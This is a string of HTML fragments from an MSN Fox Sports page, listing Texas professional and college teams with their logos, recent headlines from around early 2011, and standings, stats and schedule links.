<li class="first"><a href="http://msn.foxsports.com/nfl/standings">Standings</a></li><li><a href="http://msn.foxsports.com/nfl/team/houston-texans/stats">Stats</a></li><li><a href="http://msn.foxsports.com/nfl/team/houston-texans/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/team?categoryId=86111" title="TCU Horned Frogs"><img src="http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/85.png" alt="TCU Horned Frogs logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cfb/team?categoryId=86111">TCU Horned Frogs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/story/Unbeaten-TCU-stops-Wisconsin-2119-in-Rose-Bowl-96857989">Unbeaten TCU stops Wisconsin 21-19 in Rose Bowl</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/TCU-holds-off-Wisconsin-to-win-Rose-Bowl-">TCU wins one for the little guys </a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/WisconsinTCU-Preview-82908187">Wisconsin-TCU Preview</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cfb/story/Rose-Bowl-is-more-than-Badgers-size-Frogs-speed-90645669">Rose Bowl is more than Badgers' size, Frogs' speed</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cfb/teamStats?categoryId=86111">Stats</a></li><li><a href="http://msn.foxsports.com/cfb/teamSchedule?categoryId=86111">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cfb">College FB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/team?categoryId=86138" title="Texas Longhorns"><img src="http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/83.png" alt="Texas Longhorns logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cfb/team?categoryId=86138">Texas Longhorns</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/story/Senior-Bowl-Christian-Ponder-South-victory-012911">Ponder leads South to Senior Bowl win</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Ponder-South-win-Senior-Bowl-2410-10241756">Ponder, South win Senior Bowl, 24-10</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/AP-AllAmerica-Team-List-25730143">AP All-America Team, List</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cfb/story/Texas-DE-Acho-wins-scholarathlete-award-52030010">Texas DE Acho wins scholar-athlete award</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cfb/teamStats?categoryId=86138">Stats</a></li><li><a href="http://msn.foxsports.com/cfb/teamSchedule?categoryId=86138">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cfb">College FB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/team?categoryId=86128" title="Texas Tech Red Raiders"><img src="http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/86.png" alt="Texas Tech Red Raiders logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cfb/team?categoryId=86128">Texas Tech Red Raiders</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/story/Mike-Leach-lawsuit-thrown-out-against-Texas-Tech-012111">Appeals court rules against Leach</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/NCAA-Texas-Tech-broke-recruiting-rules-in-three-sports-010711">NCAA: Texas Tech broke recruiting rules</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Mike-Leach-thought-he-was-perfect-fit-for-Maryland-010411">Leach thought he was Terps match</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cfb/story/Texas-Tech-45-Northwestern-38-91337506">Texas Tech 45, Northwestern 38</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cfb/teamStats?categoryId=86128">Stats</a></li><li><a href="http://msn.foxsports.com/cfb/teamSchedule?categoryId=86128">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cfb">College FB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/team?categoryId=86112" title="SMU Mustangs"><img src="http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/82.png" alt="SMU Mustangs logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cfb/team?categoryId=86112">SMU Mustangs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/story/Army-holds-on-to-beat-SMU-in-the-Armed-Forces-Bowl-123010">Army caps first winning season since '96</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/ArmySMU-Preview-75693926">Army-SMU Preview</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/UCF-edges-SMU-in-Conference-USA-Championship-Game-120410">UCF wins Conference USA championship</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cfb/story/UCF-SMU-meet-for-Conference-USA-championship-36668645">UCF defeats SMU 17-7 to win Conference USA title</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cfb/teamStats?categoryId=86112">Stats</a></li><li><a href="http://msn.foxsports.com/cfb/teamSchedule?categoryId=86112">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cfb">College FB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/team?categoryId=86068" title="North Texas Eagles"><img src="http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/182.png" alt="North Texas Eagles logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cfb/team?categoryId=86068">North Texas Eagles</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/story/Kansas-St-49-North-Texas-41-86875018">Kansas St. 49, North Texas 41</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/No-13-Virginia-Tech-37-Virginia-7-30594865">No. 13 Virginia Tech 37, Virginia 7</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Tuneup-for-Hokies-is-Cavaliers-bowl-game-90790195">Tuneup for Hokies is Cavaliers' bowl game</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cfb/story/Reserves-key-to-titles-bowls-for-some-ACC-teams-22352730">Reserves key to titles, bowls for some ACC teams</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cfb/teamStats?categoryId=86068">Stats</a></li><li><a href="http://msn.foxsports.com/cfb/teamSchedule?categoryId=86068">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cfb">College FB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/team?categoryId=86127" title="Baylor Bears"><img src="http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/79.png" alt="Baylor Bears logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cfb/team?categoryId=86127">Baylor Bears</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/story/Canadian-jumps-from-fire-to-pro-football-88154560">Canadian jumps from fire to pro football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Leshoure-leads-Illinois-past-Baylor-in-Texas-Bowl-67062026">Leshoure leads Illinois past Baylor in Texas Bowl</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Illinois-beats-Baylor-for-rare-bowl-win-122910">Illinois finally tastes bowl victory</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cfb/story/Bears-make-first-bowl-appearance-since-1994-47130273">Bears make first bowl appearance since 1994</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cfb/teamStats?categoryId=86127">Stats</a></li><li><a href="http://msn.foxsports.com/cfb/teamSchedule?categoryId=86127">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cfb">College FB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/team/houston-rockets" title="Houston Rockets"><img src="http://msn.foxsports.com/fe/img/NBA/TeamLogo/Large/10.png" alt="Houston Rockets logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/nba/team/houston-rockets">Houston Rockets</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nba/story/Los-Angeles-Lakers-Kobe-Bryant-outlast-Houston-Rockets-in-overtime-020111">Lakers outlast Rockets in overtime</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/RocketsJazz-Preview-28579422">Rockets-Jazz Preview</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/RocketsLakers-Preview-62348378">Rockets-Lakers Preview</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nba/story/San-Antonio-Spurs-top-Houston-Rockets-012911">Spurs top Rockets, first to 40 wins</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nba/standings">Standings</a></li><li><a href="http://msn.foxsports.com/nba/team/houston-rockets/stats">Stats</a></li><li><a href="http://msn.foxsports.com/nba/team/houston-rockets/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/team/dallas-mavericks" title="Dallas Mavericks"><img src="http://msn.foxsports.com/fe/img/NBA/TeamLogo/Large/6.png" alt="Dallas Mavericks logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/nba/team/dallas-mavericks">Dallas Mavericks</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nba/story/MavericksKnicks-Preview-52949900">Mavericks-Knicks Preview</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/Mavericks-102-Wizards-92-01372633">Mavericks 102, Wizards 92</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/WizardsMavericks-Preview-74049944">Wizards-Mavericks Preview</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nba/story/Dallas-Mavericks-take-down-Atlanta-Hawks--12911">Mavericks stay hot, topple Hawks</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nba/standings">Standings</a></li><li><a href="http://msn.foxsports.com/nba/team/dallas-mavericks/stats">Stats</a></li><li><a href="http://msn.foxsports.com/nba/team/dallas-mavericks/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/team/san-antonio-spurs" title="San Antonio Spurs"><img src="http://msn.foxsports.com/fe/img/NBA/TeamLogo/Large/24.png" alt="San Antonio Spurs logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/nba/team/san-antonio-spurs">San Antonio Spurs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nba/story/Portland-Trail-Blazers-stun-NBA-best-San-Antonio-Spurs-behind-Lamarcus-Aldridges-40-points-020111">Aldridge lifts Trail Blazers past Spurs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/SpursTrail-Blazers-Preview-94032532">Spurs-Trail Blazers Preview</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/Stats-or-wins-Duncans-AllStar-spot-is-at-stake-32880345">Stats or wins? Duncan's All-Star spot is at stake</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nba/story/San-Antonio-Spurs-top-Houston-Rockets-012911">Spurs top Rockets, first to 40 wins</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nba/standings">Standings</a></li><li><a href="http://msn.foxsports.com/nba/team/san-antonio-spurs/stats">Stats</a></li><li><a href="http://msn.foxsports.com/nba/team/san-antonio-spurs/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71871" title="Baylor Bears"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/50.gif" alt="Baylor Bears logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71871">Baylor Bears</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/Baylor-70-Colorado-66-30467175">Baylor 70, Colorado 66</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Jimmermania-highlights-seasons-top-performances-13336281">Jimmermania highlights season's top performances</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Oneanddone-6plus-players-who-might-leave-quick-78004338">One-and-done? 6-plus players who might leave quick</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/Kansas-St-69-Baylor-61-11058486">Kansas St. 69, Baylor 61</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71871">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71871">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71650" title="North Texas Eagles"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/415.gif" alt="North Texas Eagles logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71650">North Texas Eagles</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/Denver-80-North-Texas-67-66077993">Denver 80, North Texas 67</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/LouisianaLafayette-93-North-Texas-88-50545535">Louisiana-Lafayette 93, North Texas 88</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/LouisianaLafayette-defeats-North-Texas-9388-18092539">Louisiana-Lafayette defeats North Texas 93-88</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/North-Texas-83-Arkansas-St-64-96725786">North Texas 83, Arkansas St. 64</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71650">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71650">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71926" title="SMU Mustangs"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/515.gif" alt="SMU Mustangs logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71926">SMU Mustangs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/SMU-75-Rice-68-35158885">SMU 75, Rice 68</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/SMU-59-Tulsa-58-81254706">SMU 59, Tulsa 58</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/SMU-79-Southern-Miss-65-96624346">SMU 79, Southern Miss. 65</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/UAB-67-SMU-53-71299212">UAB 67, SMU 53</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71926">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71926">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71780" title="Texas Arlington Mavericks"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/588.gif" alt="Texas Arlington Mavericks logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71780">Texas Arlington Mavericks</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/TexasArlington-83-Texas-St-66-30375558">Texas-Arlington 83, Texas St. 66</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/TexasArlington-62-Stephen-FAustin-52-85322240">Texas-Arlington 62, Stephen F.Austin 52</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/TexasArlington-70-Texas-AampMCorpus-Christi-49-49303869">Texas-Arlington 70, Texas A&amp,M-Corpus Christi 49</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/Lamar-76-TexasArlington-72-22113261">Lamar 76, Texas-Arlington 72</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71780">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71780">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71874" title="Texas Longhorns"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/585.gif" alt="Texas Longhorns logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71874">Texas Longhorns</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/Texas-trounces-Texas-A%26M-for-Big-12-win-013111">Longhorns get rare College Station win</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Defense-is-the-name-of-the-game-in-Big-12-54140452">Defense is the name of the game in Big 12</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/TexasTexas-AM-Preview-33061025">Texas-Texas A&M Preview</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/Texas-Longhorns-topple-Missouri-Tigers-012911">No. 7 Texas drops No. 11 Missouri</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71874">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71874">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71872" title="Texas Tech Red Raiders"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/592.gif" alt="Texas Tech Red Raiders logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71872">Texas Tech Red Raiders</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/kansas-jayhawks-defeat-texas-tech-red-raiders-020111">Kansas gets easy win over Texas Tech</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/KansasTexas-Tech-Preview-16250128">Kansas-Texas Tech Preview</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Texas-Tech-75-Oklahoma-St-74-80642690">Texas Tech 75, Oklahoma St. 74</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/Texas-Tech-92-Iowa-St-83-37630109">Texas Tech 92, Iowa St. 83</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71872">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71872">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71922" title="TCU Horned Frogs"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/576.gif" alt="TCU Horned Frogs logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71922">TCU Horned Frogs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/Air-Force-66-TCU-65-64413866">Air Force 66, TCU 65</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Utah-75-TCU-62-52354638">Utah 75, TCU 62</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/No-9-BYU-83-TCU-67-33157554">No. 9 BYU 83, TCU 67</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/Colorado-St-79-TCU-69-99128904">Colorado St. 79, TCU 69</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71922">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71922">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk" title="SMU Mustangs - Women"><img src="http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/515.gif" alt="SMU Mustangs - Women logo" width="80" height="80" /></a><div><span class="nonews"><a href="http://msn.foxsports.com/wcbk">SMU Mustangs - Women</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/wcbk/statsTeam">Stats</a></li><li><a href="http://msn.foxsports.com/wcbk/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk" title="TCU Horned Frogs - Women"><img src="http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/576.gif" alt="TCU Horned Frogs - Women logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/wcbk">TCU Horned Frogs - Women</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/story/No-20-TCU-78-Colorado-St-51-34049731">No. 20 TCU 78, Colorado St. 51</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/No-23-TCU-81-UNLV-61-58963977">No. 23 TCU 81, UNLV 61</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/No-22-TCU-80-San-Diego-St-63-56753002">No. 22 TCU 80, San Diego St. 63</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/wcbk/story/Wyoming-73-No-22-TCU-67-02071027">Wyoming 73, No. 22 TCU 67</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/wcbk/statsTeam">Stats</a></li><li><a href="http://msn.foxsports.com/wcbk/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk" title="Texas Longhorns - Women"><img src="http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/585.gif" alt="Texas Longhorns - Women logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/wcbk">Texas Longhorns - Women</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/story/National-Team-Leaders3">National Team Leaders</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/CONNECTICUT-370-61746829">CONNECTICUT (38-0)</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/Nebraskas-Yori-chosen-AP-coach-of-the-year-90044251">Nebraska's Yori chosen AP coach of the year</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/wcbk/story/Baylor-Lady-Bears-Roster-34247840">Baylor Lady Bears Roster</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/wcbk/statsTeam">Stats</a></li><li><a href="http://msn.foxsports.com/wcbk/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk" title="Texas Tech Red Raiders - Women"><img src="http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/592.gif" alt="Texas Tech Red Raiders - Women logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/wcbk">Texas Tech Red Raiders - Women</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/story/Womens-NCAA-Championship-Winningest-Coaches-87055644">Women's NCAA Championship Winningest Coaches</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/Fewest-Points-in-One-Half-NCAA-Tournament-07292331">Fewest Points in One Half - NCAA Tournament</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/Womens-NCAA-AllTournament-Teams-37687435">Women's NCAA All-Tournament Teams</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/wcbk/story/OKLAHOMA-2710-68082171">OKLAHOMA (27-10)</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/wcbk/statsTeam">Stats</a></li><li><a href="http://msn.foxsports.com/wcbk/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk" title="Baylor Bears - Women"><img src="http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/50.gif" alt="Baylor Bears - Women logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/wcbk">Baylor Bears - Women</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/story/National-Team-Leaders">National Team Leaders</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/NCAA-Womens-Final-Four-MVPs-25159731">NCAA Women's Final Four MVPs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/NCAA-Championship-Scores-81750110">NCAA Championship Scores</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/wcbk/story/Baylors-future-bright-for-Griner-young-Bears-60468229">Baylor's future bright for Griner, young Bears</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/wcbk/statsTeam">Stats</a></li><li><a href="http://msn.foxsports.com/wcbk/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wnba" title="San Antonio Silver Stars"><img src="http://msn.foxsports.com/fe/img/WNBA/TeamLogo/Large/8.gif" alt="San Antonio Silver Stars logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/wnba">San Antonio Silver Stars</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wnba/story/Leuchanka-leads-Belarus-to-7053-upset-of-Russia-67166762">Leuchanka leads Belarus to 70-53 upset of Russia</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wnba/story/USA-aims-to-reclaim-gold-at-womens-hoops-worlds-21153241">USA aiming for gold at women's basketball worlds</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wnba/story/Mercury-92-Silver-Stars-73-19788864">Mercury 92, Silver Stars 73</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/wnba/story/Silver-Stars-92%2C-Mercury-91">Phoenix tops San Antonio 92-73 in WNBA playoffs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wnba/standings">Standings</a></li><li><a href="http://msn.foxsports.com/wnba/stats">Stats</a></li><li><a href="http://msn.foxsports.com/wnba/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/wnba">WNBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb/team/houston-astros" title="Houston Astros"><img src="http://msn.foxsports.com/fe/img/MLB/TeamLogo/Large/18.gif" alt="Houston Astros logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/mlb/team/houston-astros">Houston Astros</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb/story/Houston-Astros-reach-34M-3-year-deal-with-RHP-Wandy-Rodriguez-012511">Astros, Rodriguez reach 3-year deal</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb/story/Astros-pitcher-Carrillo-arrested-at-Fla-casino-03199288">Astros pitcher Carrillo arrested at Fla. casino</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb/story/Salary-Arbitration-Eligibles-List">Salary Arbitration Eligibles List</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/mlb/story/Astros-infielder-Keppinger-to-have-foot-surgery-48484608">Astros infielder Keppinger to have foot surgery</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/mlb/team/houston-astros/stats">Stats</a></li><li><a href="http://msn.foxsports.com/mlb/team/houston-astros/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/mlb">MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb/team/texas-rangers" title="Texas Rangers"><img src="http://msn.foxsports.com/fe/img/MLB/TeamLogo/Large/13.gif" alt="Texas Rangers logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/mlb/team/texas-rangers">Texas Rangers</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb/story/Baltimore-Orioles-Vladimir-Guerrero-contract-offer-012911">Orioles hoping to add Guerrero</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb/story/Francicso-signs-oneyear-deal-with-Blue-Jays-27438403">Francicso signs one-year deal with Blue Jays</a>
...[SNIP]...
